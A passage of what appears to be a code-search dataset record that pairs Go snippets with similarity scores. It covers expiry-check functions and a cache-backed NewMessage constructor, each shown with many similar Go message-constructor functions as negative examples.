{\n\t\tlog.Printf(\"Now: %d, expiry: %d\", now, req.DiscoveryMsgData.Expiry)\n\t\tlog.Println(\"Message Expired. Dropping message... \")\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (c Certificate) Expired(now time.Time, skew time.Duration) bool {\n\treturn c.IssuedAt.After(now) || c.ExpiresAt.Before(now)\n}", "func (r *OperationReqReconciler) isExpired(request *userv1.Operationrequest) bool {\n\tif request.Status.Phase != userv1.RequestCompleted && request.CreationTimestamp.Add(r.expirationTime).Before(time.Now()) {\n\t\tr.Logger.Info(\"operation request is expired\", \"name\", request.Name)\n\t\treturn true\n\t}\n\treturn false\n}", "func (v *VerificationCode) IsExpired() bool {\n\tnow := time.Now().UTC()\n\treturn v.ExpiresAt.Before(now) && v.LongExpiresAt.Before(now)\n}", "func (s *Store) HasExpirationChanged() bool {\n\ts.lock.RLock()\n\texpirationChanged := s.expirationChanged\n\ts.lock.RUnlock()\n\treturn expirationChanged\n}", "func (p *UserPendingPermissions) Expired(ttl time.Duration, now time.Time) bool {\n\treturn !now.Before(p.UpdatedAt.Add(ttl))\n}", "func isTokenExpired(jwtData *JWTData) bool {\n\n\tnowTime := time.Now().Unix()\n\texpireTime := int64(jwtData.Exp)\n\n\tif expireTime < nowTime {\n\t\tlog.Warnf(\"Token is expired!\")\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (dc *DelegatedCredential) isExpired(start, now time.Time) bool {\n\tend := start.Add(dc.cred.validTime)\n\treturn !now.Before(end)\n}", "func (ks PublicKeySet) Expired() bool {\n\treturn timeNow().After(ks.Expiry)\n}", "func isLeaseExpired(lease *db.Lease, context *leaseContext, actualPrincipalSpend float64, principalBudgetAmount float64) (bool, db.LeaseStatusReason) {\n\n\tif context.expireDate >= lease.ExpiresOn {\n\t\treturn true, db.LeaseExpired\n\t} else if context.actualSpend > lease.BudgetAmount {\n\t\treturn true, db.LeaseOverBudget\n\t} else if actualPrincipalSpend > principalBudgetAmount {\n\t\treturn true, db.LeaseOverPrincipalBudget\n\t}\n\n\treturn false, db.LeaseActive\n}", "func (m *Manager) isTokenExpired(token *Token) bool {\n\tif !m.bearerAuth {\n\t\treturn false\n\t}\n\tunixTime := time.Now().Unix()\n\treturn token.Expires < unixTime\n}", "func (m *ProviderTerms) Expired() bool {\n\treturn m.ExpiredAt < time.Now()+TermsExpiredDuration\n}", "func isExpired(filename string) bool {\n\tvar t time.Time\n\tlast := timeFromFilename(filename)\n\n\t// exp time for prices dataset is 1 day\n\tif strings.Contains(filename, datasetPrices) {\n\t\tt = last.AddDate(0, 0, 1)\n\t}\n\n\t// exp time for stations dataset is 15 days\n\tif strings.Contains(filename, datasetStations) {\n\t\tt = last.AddDate(0, 0, 15)\n\t}\n\n\treturn t.Before(time.Now())\n}", "func (dcr *ExchangeWallet) LocktimeExpired(contract dex.Bytes) (bool, time.Time, error) {\n\t_, _, locktime, _, err := dexdcr.ExtractSwapDetails(contract, chainParams)\n\tif err != nil {\n\t\treturn false, time.Time{}, fmt.Errorf(\"error extracting contract locktime: %w\", err)\n\t}\n\tcontractExpiry := time.Unix(int64(locktime), 0).UTC()\n\treturn time.Now().UTC().After(contractExpiry), contractExpiry, nil\n}", "func isQueryExpired(expires int64) bool {\n\tif expires < time.Now().Unix() {\n\t\tlog.Info(\"Query expired\", \"expirationTime\", expires, \"now\", time.Now().Unix())\n\t\treturn true\n\t}\n\tlog.Info(\"Query is not expired\")\n\treturn false\n}", "func (c *memcache) DeleteExpired() {\n\tc.items.Range(func(key, value interface{}) bool {\n\t\tv := value.(*Item)\n\t\tk := key.(string)\n\t\t// delete outdate for memory cahce\n\t\tif v.Expire() {\n\t\t\tc.delete(k)\n\t\t}\n\t\treturn true\n\t})\n}", "func isExpired(timestamp interface{}) bool {\n\tif validity, ok := timestamp.(float64); ok {\n\t\ttm := time.Unix(int64(validity), 0)\n\t\tremainder := tm.Sub(time.Now())\n\t\tif remainder > 0 {\n\t\t\treturn true\n\t\t}\n\t} else {\n\t\tglog.Error(\"Error casting timestamp to string. This may be due to a invalid token\")\n\t\textension.Exit(extension.ErrorExitCode)\n\t}\n\treturn false\n}", "func (btc *ExchangeWallet) LocktimeExpired(contract dex.Bytes) (bool, error) {\n\t_, _, locktime, _, err := dexbtc.ExtractSwapDetails(contract, btc.chainParams)\n\tif err != nil {\n\t\treturn false, fmt.Errorf(\"error extracting contract locktime: %v\", err)\n\t}\n\tcontractExpiry := time.Unix(int64(locktime), 0).UTC()\n\tbestBlockHash, err := btc.node.GetBestBlockHash()\n\tif err != nil {\n\t\treturn false, fmt.Errorf(\"get best block hash error: %v\", err)\n\t}\n\tbestBlockHeader, err := btc.getBlockHeader(bestBlockHash.String())\n\tif err != nil {\n\t\treturn false, fmt.Errorf(\"get best block header error: %v\", err)\n\t}\n\tbestBlockMedianTime := time.Unix(bestBlockHeader.MedianTime, 0).UTC()\n\treturn bestBlockMedianTime.After(contractExpiry), nil\n}", "func (dcr *ExchangeWallet) LocktimeExpired(contract dex.Bytes) (bool, time.Time, error) {\n\t_, _, locktime, _, err := dexdcr.ExtractSwapDetails(contract, dcr.chainParams)\n\tif err != nil {\n\t\treturn false, time.Time{}, fmt.Errorf(\"error extracting contract locktime: %w\", err)\n\t}\n\tcontractExpiry := time.Unix(int64(locktime), 0).UTC()\n\tdcr.tipMtx.RLock()\n\tblockHash := dcr.currentTip.hash\n\tdcr.tipMtx.RUnlock()\n\thdr, err := dcr.wallet.GetBlockHeader(dcr.ctx, blockHash)\n\tif err != nil {\n\t\treturn false, time.Time{}, fmt.Errorf(\"unable to retrieve the block header: %w\", err)\n\t}\n\treturn time.Unix(hdr.MedianTime, 0).After(contractExpiry), contractExpiry, nil\n}", "func (bc *MemoryCache) item_expired(name string) bool {\n\tbc.lock.Lock()\n\tdefer bc.lock.Unlock()\n\titm, ok := bc.items[name]\n\tif !ok {\n\t\treturn true\n\t}\n\tif time.Now().Unix()-itm.Lastaccess.Unix() >= itm.expired {\n\t\tdelete(bc.items, name)\n\t\treturn true\n\t}\n\treturn false\n}" ]
[ "0.7090891", "0.70129126", "0.696582", "0.69188714", "0.6754564", "0.66905755", "0.6583698", "0.6581767", "0.65576303", "0.6547072", "0.6530696", "0.65154415", "0.65109485", "0.6510724", "0.6507026", "0.65001976", "0.64995795", "0.64461267", "0.64384156", "0.6424752", "0.6424752", "0.64073217", "0.6406068", "0.63939434", "0.63723093", "0.63495916", "0.6327941", "0.63161564", "0.6308399", "0.6295798", "0.6282405", "0.6282301", "0.6270721", "0.6237172", "0.622256", "0.6196109", "0.61914504", "0.6182959", "0.61716396", "0.61592406", "0.6139014", "0.6123336", "0.61103", "0.60981256", "0.6067701", "0.60663015", "0.6065126", "0.6017028", "0.601444", "0.60122436", "0.60079557", "0.6002805", "0.5964017", "0.5959358", "0.5957999", "0.59579116", "0.5946031", "0.5938278", "0.5935726", "0.59276444", "0.59063214", "0.58919317", "0.5882027", "0.58603054", "0.5860012", "0.58574265", "0.5842801", "0.58414835", "0.58410674", "0.58408004", "0.5820283", "0.5820135", "0.58177394", "0.58124954", "0.5803899", "0.5763628", "0.575438", "0.5731965", "0.57072264", "0.5696373", "0.5687112", "0.5681203", "0.56228334", "0.5615113", "0.55991596", "0.55885607", "0.55634385", "0.5563321", "0.5539632", "0.5521836", "0.551969", "0.5506899", "0.55002564", "0.5466505", "0.5432012", "0.54296124", "0.5420981", "0.540328", "0.5373739", "0.5369834" ]
0.7297898
0
NewMessage is the supported way to obtain a new Message. This makes use of a "cache" which greatly reduces the load on the garbage collector.
func NewMessage(sz int) *Message { var m *Message var ch chan *Message for i := range messageCache { if sz < messageCache[i].maxbody { ch = messageCache[i].cache sz = messageCache[i].maxbody break } } select { case m = <-ch: default: m = &Message{} m.bbuf = make([]byte, 0, sz) m.hbuf = make([]byte, 0, 32) m.bsize = sz } m.refcnt = 1 m.Body = m.bbuf m.Header = m.hbuf return m }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (s *Store) NewMessage(_ context.Context, req *meta.StoreNewMessageRequest) (*meta.StoreNewMessageResponse, error) {\n\tlog.Debugf(\"Store NewMessage, msg:%v\", req.Msg)\n\t// add消息到db\n\tif err := s.message.add(*req.Msg); err != nil {\n\t\treturn &meta.StoreNewMessageResponse{Header: &meta.ResponseHeader{Code: -1, Msg: err.Error()}}, nil\n\t}\n\t// 再添加未推送消息队列\n\tif err := s.message.addQueue(req.Msg.ID); err != nil {\n\t\treturn &meta.StoreNewMessageResponse{Header: &meta.ResponseHeader{Code: -1, Msg: err.Error()}}, nil\n\t}\n\t// 再调用推送\n\treturn nil, nil\n}", "func New() *Message {\n\tmsg := &Message{\n\t\tStatus: STATUS_NEW,\n\t\tFilter: false,\n\t\tContent: Content{\n\t\t\tHead: Head{},\n\t\t\tData: nil,\n\t\t},\n\t}\n\treturn msg\n}", "func NewMessage() (mess *Message) {\n\tmess = new(Message)\n\tmess.downloaded = time.Now()\n\treturn mess\n}", "func NewMessage() *Message {\n\treturn protocol.NewMessage()\n}", "func NewMessage() Message {\n\treturn Message(\"Hi there!\")\n}", "func NewMessage(db *sql.DB) Message {\n\treturn &message{\n\t\tdb: db,\n\t}\n}", "func (message *Message) NewMessage(action string, version Version, key Key, data []byte) *Message {\n\tchild := &Message{}\n\tchild.Ctx = context.Background()\n\n\tchild.Ctx = NewParentIDContext(child.Ctx, ParentID(message.ID))\n\tchild.Ctx = NewParentTimestampContext(child.Ctx, ParentTimestamp(message.Timestamp))\n\n\tchild.ID = uuid.Must(uuid.NewV4()).String()\n\tchild.Action = action\n\tchild.Status = StatusOK\n\tchild.Data = data\n\tchild.Timestamp = time.Now()\n\tchild.Version = message.Version\n\tchild.Key = key\n\n\tif child.Key == nil {\n\t\tchild.Key = message.Key\n\t}\n\n\tif version == NullVersion {\n\t\tchild.Version = message.Version\n\t}\n\n\treturn child\n}", "func NewMessage(message *types.Message) {\n\tif db.NewRecord(message) {\n\t\tdb.Create(message)\n\t}\n}", "func (b *GroupsSetLongPollSettingsBuilder) MessageNew(v bool) *GroupsSetLongPollSettingsBuilder {\n\tb.Params[\"message_new\"] = v\n\treturn b\n}", "func messageAddNew(msg string) (Message, error) {\n\t//Initialize temp structure to be able to use append function\n\ttmpMessage := Message{}\n\n\tlastId += 1\n\ttmpMessage.Id = lastId\n\ttmpMessage.Message = msg\n\n\tmessages = append(messages, tmpMessage)\n\n\treturn tmpMessage, nil\n}", "func NewMessage(data []byte) (*Message, error) {\n\treturn &Message{}, nil\n}", "func (message *Message) NewMessage(action string, version Version, key metadata.Key, data []byte) *Message {\n\tif key == nil {\n\t\tkey = message.Key\n\t}\n\n\tif version == NullVersion {\n\t\tversion = message.Version\n\t}\n\n\tchild := NewMessage(action, int8(version), key, data)\n\tchild.ctx = metadata.NewParentIDContext(child.ctx, metadata.ParentID(message.ID))\n\tchild.ctx = metadata.NewParentTimestampContext(child.ctx, metadata.ParentTimestamp(message.Timestamp))\n\n\treturn child\n}", "func (b *GroupsSetCallbackSettingsBuilder) MessageNew(v bool) *GroupsSetCallbackSettingsBuilder {\n\tb.Params[\"message_new\"] = v\n\treturn b\n}", "func NewMessage(text string) Message {\n\treturn Message{Text: text}\n}", "func NewMessage(mtype string, message string) *Message {\n\treturn &Message{\n\t\tTime: time.Now(),\n\t\tType: mtype,\n\t\tMessage: message,\n\t}\n}", "func NewMessage(action string, version int8, key []byte, data []byte) *Message {\n\t// NOTE: take a look at other ways of generating id's\n\tid := uuid.Must(uuid.NewV4()).String()\n\n\tif key == nil {\n\t\tkey = []byte(id)\n\t}\n\n\treturn &Message{\n\t\tID: id,\n\t\tAction: action,\n\t\tVersion: Version(version),\n\t\tKey: key,\n\t\tData: data,\n\t\tack: make(chan struct{}),\n\t\tnack: make(chan struct{}),\n\t\tresponse: UnkownResolvedStatus,\n\t\tStatus: StatusOK,\n\t\tTimestamp: time.Now(),\n\t\tctx: context.Background(),\n\t}\n}", "func NewMessage(action string, version int8, key []byte, data []byte) *Message {\n\t// NOTE: take a look at other ways of generating id's\n\tid := uuid.Must(uuid.NewV4()).String()\n\n\tif key == nil {\n\t\tkey = []byte(id)\n\t}\n\n\treturn &Message{\n\t\tCtx: context.Background(),\n\t\tID: id,\n\t\tAction: action,\n\t\tVersion: Version(version),\n\t\tKey: key,\n\t\tData: data,\n\t\tasync: make(chan struct{}, 0),\n\t}\n}", "func (pool *MessagePool) New() (msg *Message) {\n\tselect {\n\tcase msg = <-pool.Messages:\n\tdefault:\n\t\tmsg = &Message{}\n\t}\n\treturn\n}", "func NewMessage(topic string, key, value []byte) Message {\n\treturn &defaultMessage{topic, key, value}\n}", "func NewMessage(content []byte) *Message {\n\treturn &Message{assembled: content}\n}", "func (p *Pipe) newMessage() message {\n\tm := message{sourceID: p.ID()}\n\tif len(p.params) > 0 {\n\t\tm.params = p.params\n\t\tp.params = make(map[string][]phono.ParamFunc)\n\t}\n\tif len(p.feedback) > 0 {\n\t\tm.feedback = p.feedback\n\t\tp.feedback = make(map[string][]phono.ParamFunc)\n\t}\n\treturn m\n}", "func NewMessage(command, family, flags int) (*Message, error) {\n\tnlm := C.nlmsg_alloc()\n\tif nlm == nil {\n\t\treturn nil, errors.New(\"failed to create netlink message\")\n\t}\n\tC.genlmsg_put(nlm, C.NL_AUTO_PID, C.NL_AUTO_SEQ, C.int(family), 0, C.int(flags), C.uint8_t(command), genlVersion)\n\treturn &Message{nlm: nlm}, nil\n}", "func (d *Dao) NewMessage(message *model.Message) (err error) {\n\tsession := d.MongoSession.Copy()\n\tdefer session.Close()\n\tmessage.ID = d.idWorker.GetID()\n\tmessage.CreateTime = time.Now()\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = d.GetCollection(session, messageCollection).Insert(message)\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn d.BatchInsertDimensionOfflineMessage(message)\n}", "func NewMessage(req *http.Request) (IMessage, error) {\n\tvar msg Message\n\terr := json.NewDecoder(req.Body).Decode(&msg)\n\treturn &msg, err\n}", "func NewMessage(body string) *Message {\n\tmessage := &Message{\n\t\tID: uuid.New(),\n\t\tBody: body,\n\t}\n\treturn message\n}", "func NewMessage(id int, msgType string, sender int, origin int, data string) Message {\n\treturn Message{id, msgType, sender, origin, data}\n}", "func (a *BotAdapter) newMessage(channel *models.Channel, text string) *models.Message {\n\treturn &models.Message{\n\t\tID: a.idgen.ID(),\n\t\tRoomID: channel.ID,\n\t\tMsg: text,\n\t\tUser: a.user,\n\t}\n}", "func NewMessage(topic string, body []byte) Message {\n\tprops := make(map[string]string)\n\tprops[MessageWaitStoreMsgOK] = \"true\"\n\treturn Message{\n\t\tTopic: topic,\n\t\tFlag: 0,\n\t\tProperties: props,\n\t\tBody: body,\n\t}\n}", "func NewMessage(msgID uint16, data []byte) *Message {\n\n\tmsg := &Message{\n\t\tmsgLen:\t\tuint32(len(data)) + 6,\n\t\tmsgID:\t\tmsgID,\n\t\ttranID:\t\tuint32(len(data)),\n\t\tdata:\t\tdata,\n\t}\n\n\treturn msg\n}", "func (*GenericFramework) NewMessage(ctx *MessageContext) {}", "func NewMessage(message string, data interface{}) map[string]interface{} {\n\t// also can create separate type for that\n\treturn map[string]interface{}{\n\t\t\"message\": message,\n\t\t\"data\": data,\n\t}\n}", "func NewMessage(parentID string) *Message {\n\tmsg := &Message{}\n\tmsg.Header.ID = uuid.New().String()\n\tmsg.Header.ParentID = parentID\n\tmsg.Header.Timestamp = time.Now().UnixNano() / 1e6\n\treturn msg\n}", "func newMessage(c cipher.API, s string) (buf, msg []byte) {\n\treturn make([]byte, 0, len(s)+c.Overhead()), []byte(s)\n}", "func (this MessageType) New() (Message, error) {\n\tswitch this {\n\tcase CONNECT:\n\t\treturn NewConnectMessage(), nil\n\tcase CONNACK:\n\t\treturn NewConnackMessage(), nil\n\tcase PUBLISH:\n\t\treturn NewPublishMessage(), nil\n\tcase PUBACK:\n\t\treturn NewPubackMessage(), nil\n\tcase PUBREC:\n\t\treturn NewPubrecMessage(), nil\n\tcase PUBREL:\n\t\treturn NewPubrelMessage(), nil\n\tcase PUBCOMP:\n\t\treturn NewPubcompMessage(), nil\n\tcase SUBSCRIBE:\n\t\treturn NewSubscribeMessage(), nil\n\tcase SUBACK:\n\t\treturn NewSubackMessage(), nil\n\tcase UNSUBSCRIBE:\n\t\treturn NewUnsubscribeMessage(), nil\n\tcase UNSUBACK:\n\t\treturn NewUnsubackMessage(), nil\n\tcase PINGREQ:\n\t\treturn NewPingreqMessage(), nil\n\tcase PINGRESP:\n\t\treturn NewPingrespMessage(), nil\n\tcase DISCONNECT:\n\t\treturn NewDisconnectMessage(), nil\n\t}\n\n\treturn nil, fmt.Errorf(\"MessageType/NewMessage: Invalid message type %d.\", this)\n}", "func NewMessage(mcf MessageContentFrame) *Message {\n\tmsg := &Message{\n\t\tID: NextCnt(),\n\t\tPayload: make([]byte, 0),\n\t}\n\tswitch m := mcf.(type) {\n\tcase *BasicPublish:\n\t\tmsg.Method = m\n\t\tmsg.Exchange = m.Exchange\n\t\tmsg.RoutingKey = m.RoutingKey\n\tcase *BasicDeliver:\n\t\tmsg.Method = m\n\t\tmsg.Exchange = m.Exchange\n\t\tmsg.RoutingKey = m.RoutingKey\n\t}\n\treturn msg\n}", "func NewMessage(metrics ...Metric) Message {\n\treturn Message{metrics: metrics}\n}", "func NewMessage(data interface{}) (*Message, error) {\n\tm := &Message{}\n\tif err := m.unmarshalInterface(data); err != nil {\n\t\treturn nil, err\n\t}\n\treturn m, nil\n}", "func (s *DirectMessageService) New(params *DirectMessageNewParams) (*DirectMessage, *http.Response, error) {\n\tdm := new(DirectMessage)\n\tapiError := new(APIError)\n\tresp, err := s.sling.New().Post(\"new.json\").BodyForm(params).Receive(dm, apiError)\n\treturn dm, resp, relevantError(err, *apiError)\n}", "func NewMessage(from, text, boxId string, withDbUpdate bool) (*Message, *MessageBox, error) {\n\tmsgBox, err := Get(boxId)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\tmsg := &Message{From: from, Text: text, ID: commons.GenerateUniqueId()}\n\tif withDbUpdate {\n\t\tmsgBox.Messages.Add(msg.ID)\n\t\tif err := db.Update(from, msg, msgBox); err != nil {\n\t\t\treturn nil, nil, err\n\t\t}\n\t}\n\treturn msg, msgBox, nil\n}", "func NewMessage(data []byte, offset int64) *Message {\n\tinternal := &mInternal{\n\t\tdata: data,\n\t\tmarked: false,\n\t\tcommitted: false,\n\t\toffset: offset,\n\t\tupstreamDoneChan: make(chan struct{}),\n\t\tmu: sync.Mutex{},\n\t}\n\treturn &Message{\n\t\tinternal,\n\t\t&MessageMock{\n\t\t\tGetDataFunc: internal.getDataFunc,\n\t\t\tMarkFunc: internal.markFunc,\n\t\t\tCommitFunc: internal.commitFunc,\n\t\t\tReleaseFunc: internal.releaseFunc,\n\t\t\tCommitAndReleaseFunc: internal.commitAndReleaseFunc,\n\t\t\tOffsetFunc: internal.offsetFunc,\n\t\t\tUpstreamDoneFunc: internal.upstreamDoneFunc,\n\t\t},\n\t}\n}", "func NewMessage(topic string, message interface{}) (messaging.Messager, error) {\n\tvar (\n\t\tpayload []byte\n\t\terr error\n\t)\n\tswitch v := message.(type) {\n\tcase proto.Message:\n\t\tpayload, err = proto.Marshal(v)\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"cannot convert protobuf message to bytes %v\", err)\n\t\t}\n\tcase []byte:\n\t\tpayload = v\n\tdefault:\n\t\tpayload, err = getBytes(v)\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"cannot convert message to bytes %v\", err)\n\t\t}\n\t}\n\treturn &messager{\n\t\ttopic: topic,\n\t\tpayload: payload,\n\t\traw: message,\n\t}, nil\n}", "func NewMessage(uri string, data types.Dict) *Message {\n\treturn &Message{\n\t\tURI: uri,\n\t\tData: data,\n\t}\n}", "func NewMessage(id MessageID, body []byte) *Message {\n\treturn &Message{\n\t\tID: id,\n\t\tBody: body,\n\t\tTimestamp: time.Now().UnixNano(),\n\t}\n}", "func NewMessage(id MessageID, body []byte) *Message {\n\treturn &Message{\n\t\tID: id,\n\t\tBody: body,\n\t\tTimestamp: time.Now().UnixNano(),\n\t}\n}", "func New(payload string) *Message {\n\n\tmsg := &Message{\n\t\tpayload: payload,\n\t\tenteredUtc: time.Time{},\n\t\texitedUtc: time.Time{},\n\t}\n\n\treturn msg\n}", "func handleNewMessage(msg *arbor.ProtocolMessage, recents *RecentList, store *arbor.Store, broadcaster *Broadcaster) {\n\terr := msg.ChatMessage.AssignID()\n\tif err != nil {\n\t\tlog.Println(\"Error creating new message\", err)\n\t}\n\trecents.Add(msg.ChatMessage)\n\tstore.Add(msg.ChatMessage)\n\tbroadcaster.Send(msg)\n}", "func NewMessage(data map[string]interface{}, regIDs ...string) *Message {\n\treturn &Message{RegistrationIDs: regIDs, Data: data}\n}", "func NewMessage(messageType vars.MessageType, message string, responseCode vars.ResponseCode, token string) Message {\n\treturn Message{MessageType: messageType, Message: message, ResponseCode: responseCode, Token: token}\n}", "func NewMessage(hdr linux.NetlinkMessageHeader) *Message {\n\treturn &Message{\n\t\tbuf: binary.Marshal(nil, usermem.ByteOrder, hdr),\n\t}\n}", "func (s *service) MessageCreate(ctx context.Context, req *MessageCreateRequest) (*MessageCreateResponse, error) {\n\tif req.Sender == \"\" {\n\t\treturn nil, errors.Errorf(\"no sender specified\")\n\t}\n\tif req.Channel == \"\" {\n\t\treturn nil, errors.Errorf(\"no channel specified\")\n\t}\n\n\tsender, err := s.lookup(ctx, req.Sender, nil)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tsenderKey, err := s.edx25519Key(sender)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tchannel, err := keys.ParseID(req.Channel)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tchannelKey, err := s.edx25519Key(channel)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// TODO: Prev\n\tid := req.ID\n\tif id == \"\" {\n\t\tid = encoding.MustEncode(keys.RandBytes(32), encoding.Base62)\n\t}\n\tmsg := &api.Message{\n\t\tID: id,\n\t\tText: req.Text,\n\t\tSender: sender,\n\t\tTimestamp: s.clock.NowMillis(),\n\t}\n\n\tif err := s.client.MessageSend(ctx, msg, senderKey, channelKey); err != nil {\n\t\treturn nil, err\n\t}\n\n\t// TODO: Trigger message update asynchronously.\n\t// if err := s.pullMessages(ctx, channel, sender); err != nil {\n\t// \treturn nil, err\n\t// }\n\n\tout, err := s.messageToRPC(ctx, msg)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &MessageCreateResponse{\n\t\tMessage: out,\n\t}, nil\n}", "func NewMessage(\n\tchannelID int32,\n\tmessageIndex int32,\n\tcreator string,\n\tcontent string,\n\ttags []string,\n\tcreatedAt time.Time,\n\tpollOptions []string,\n\tpayload []byte,\n) (Message, error) {\n\tvar message Message\n\n\tmessage.ChannelID = channelID\n\tmessage.MessageIndex = messageIndex\n\tmessage.Creator = creator\n\n\t// Verify content\n\tif len(content) > MessageContentMaxLength {\n\t\treturn message, sdkerrors.Wrap(ErrInvalidMessage, \"content too big\")\n\t}\n\tmessage.Content = content\n\n\t// Check tags format\n\tfor _, tag := range tags {\n\t\tif !checkTag(tag) {\n\t\t\treturn message, sdkerrors.Wrap(ErrInvalidMessage, fmt.Sprintf(\"tag %v is unauthorized\", tag))\n\t\t}\n\t}\n\tmessage.Tags = tags\n\n\tmessage.CreatedAt = createdAt.Unix()\n\n\t// If poll options are present, we append a poll into the message\n\tif len(pollOptions) == 0 {\n\t\tmessage.HasPoll = false\n\t} else {\n\t\tmessage.HasPoll = true\n\n\t\tnewPoll, err := NewPoll(pollOptions)\n\t\tif err != nil {\n\t\t\treturn message, sdkerrors.Wrap(ErrInvalidMessage, err.Error())\n\t\t}\n\n\t\tmessage.Poll = &newPoll\n\t}\n\n\tmessage.Payload = payload\n\n\treturn message, nil\n}", "func NewMessage(registrationIds ...string) *Message {\n\treturn &Message{\n\t\tData: make(map[string]interface{}),\n\t\tRegistrationIds: registrationIds,\n\t}\n}", "func (p *Payload) NewMessage() (*bytes.Reader, error) {\n\tdata, err := json.Marshal(p.Message)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif len(data) <= 2 || strings.Contains(string(data), \"null\") {\n\t\treturn nil, errors.New(\"Message format is not correct\")\n\t}\n\tbody := bytes.NewReader(data)\n\treturn body, err\n\n}", "func NewMessage(registrationIDs []string, data map[string]interface{}, priority string, timeToLive int) *Message {\n\treturn &Message{\n\t\tRegistrationIDs: registrationIDs,\n\n\t\tPriority: priority,\n\t\tTimeToLive: timeToLive,\n\n\t\tData: data}\n}", "func NewMessage(code string, messageType messagetype.MessageType, definition string, args ...interface{}) IMessage {\n\treturn &Message{\n\t\tcode: code,\n\t\tmessageType: messageType,\n\t\tdefinition: definition,\n\t\targs: args,\n\t}\n}", "func NewMessage(content, context string) *Message {\n\tid := AddTranslation(defaultLocale, context, content, content)\n\treturn &Message{id: id}\n}", "func NewChatMessage()(*ChatMessage) {\n m := &ChatMessage{\n Entity: *NewEntity(),\n }\n return m\n}", "func newMessageNode(msg schema.Message, next *messageNode) *messageNode {\n\treturn &messageNode{\n\t\tmessage: msg,\n\t\tnext: next,\n\t}\n}", "func NewMessage(message interface{}, contentType string, headers ...string) (*Message, error) {\n\tif contentType == \"\" {\n\t\tcontentType = applicationJSON\n\t}\n\tm := &Message{\n\t\tHeader: map[string]string{\n\t\t\tContentType: contentType,\n\t\t\tMessageType: GetMessageType(message),\n\t\t},\n\t}\n\tif len(headers)%2 == 1 {\n\t\treturn nil, status.InvalidArgument(\"kv must be provided in pairs\")\n\t}\n\tfor i := 0; i < len(headers)/2; i++ {\n\t\tm.Header[headers[i]] = headers[i+1]\n\t}\n\tif err := m.MarshalToBody(message); err != nil {\n\t\treturn nil, err\n\t}\n\treturn m, nil\n}", "func NewMessage(summary string, err error, affectHealth bool, healthStatus HealthStatus) *Message {\n\treturn &Message{Summary: summary, Error: err, AffectHealth: affectHealth, HealthStatus: healthStatus}\n}", "func (f *factory) NewMessageUsecase() MessageUsecase {\n\n\tmessageInstaceOnce.Do(func() {\n\n\t\tMessageUsecaseInstance = message{\n\t\t\tMessageStatusRepo: f.NewMessageStatusRepository(),\n\t\t\tUserRepo: f.NewUserRepository(),\n\t\t\tSenderRepo: f.NewSenderRepository(),\n\t\t\tMessageLogRepo: f.NewMessageLogRepository(),\n\t\t\tMessageStatusV1Repo: f.NewMessageStatusV1Repository(),\n\t\t}\n\n\t})\n\n\treturn MessageUsecaseInstance\n\n}", "func New(instrument instrument.Instrument) *Message {\n\tvar m Message\n\tm.SetInstrument(instrument)\n\treturn &m\n}", "func NewMessage(text, channel string) *Message {\n\treturn &Message{\n\t\tid: formatTime(time.Now()),\n\t\tmessageType: \"message\",\n\t\tchannel: channel,\n\t\ttext: text,\n\t}\n}", "func NewMessage(strongParents []MessageID, weakParents []MessageID, issuingTime time.Time, issuerPublicKey ed25519.PublicKey, sequenceNumber uint64, payload payload.Payload, nonce uint64, signature ed25519.Signature) (result *Message) {\n\t// remove duplicates, sort in ASC\n\tsortedStrongParents := sortParents(strongParents)\n\tsortedWeakParents := sortParents(weakParents)\n\n\t// syntactical validation\n\tparentsCount := len(sortedStrongParents) + len(sortedWeakParents)\n\tif parentsCount < MinParentsCount || parentsCount > MaxParentsCount {\n\t\tpanic(fmt.Sprintf(\"amount of parents (%d) not in valid range (%d-%d)\", parentsCount, MinParentsCount, MaxParentsCount))\n\t}\n\n\tif len(sortedStrongParents) < MinStrongParentsCount {\n\t\tpanic(fmt.Sprintf(\"amount of strong parents (%d) failed to reach MinStrongParentsCount (%d)\", len(strongParents), MinStrongParentsCount))\n\t}\n\n\treturn &Message{\n\t\tversion: MessageVersion,\n\t\tstrongParents: sortedStrongParents,\n\t\tweakParents: sortedWeakParents,\n\t\tissuerPublicKey: issuerPublicKey,\n\t\tissuingTime: issuingTime,\n\t\tsequenceNumber: sequenceNumber,\n\t\tpayload: payload,\n\t\tnonce: nonce,\n\t\tsignature: signature,\n\t}\n}", "func NewMessage(sequence, sendTimeStamp int64, packetSize int) *Message {\n\treturn &Message{SequenceNumber: sequence, SendTimeStamp: sendTimeStamp, RespondTimeStamp: 0, ServerInfoLength: 0, Length: packetSize}\n}", "func NewMessage(content []byte, origin *Origin, status string, ingestionTimestamp int64) *Message {\n\treturn &Message{\n\t\tContent: content,\n\t\tOrigin: origin,\n\t\tStatus: status,\n\t\tIngestionTimestamp: ingestionTimestamp,\n\t}\n}", "func newMsg(t string) ([]byte, error) {\n\tswitch t {\n\tcase \"version\":\n\t\treturn newVersion()\n\tcase \"verack\":\n\t\treturn newVerack()\n\tcase \"getheaders\":\n\t\treturn newHeadersReq()\n\tcase \"getaddr\":\n\t\treturn newGetAddr()\n\n\tdefault:\n\t\treturn nil, errors.New(\"Unknown message type\")\n\t}\n}", "func (q *Q) WebNewMessage(response http.ResponseWriter, request *http.Request) {\n\tvars := mux.Vars(request)\n\tmsg := q.Message(vars[\"topic\"])\n\tif msg != nil {\n\t\t// woot woot! message found\n\t\tresponse.WriteHeader(http.StatusOK)\n\t\tfmt.Fprintf(response, msg.String())\n\t} else {\n\t\t// boo, couldn't find a message\n\t\tresponse.WriteHeader(http.StatusNotFound)\n\t\tfmt.Fprintf(response, \"{}\")\n\t}\n}", "func NewMessage(messageType MessageType, from string, data []byte, content []byte) *Message {\n\treturn &Message{messageType: messageType, from: from, data: data, content: content}\n}", "func NewMessage(initiator string, t MsgType, payload interface{}, span opentracing.Span) Message {\n\tmsg := Message{\n\t\tID: NewMessageID(),\n\t\tType: 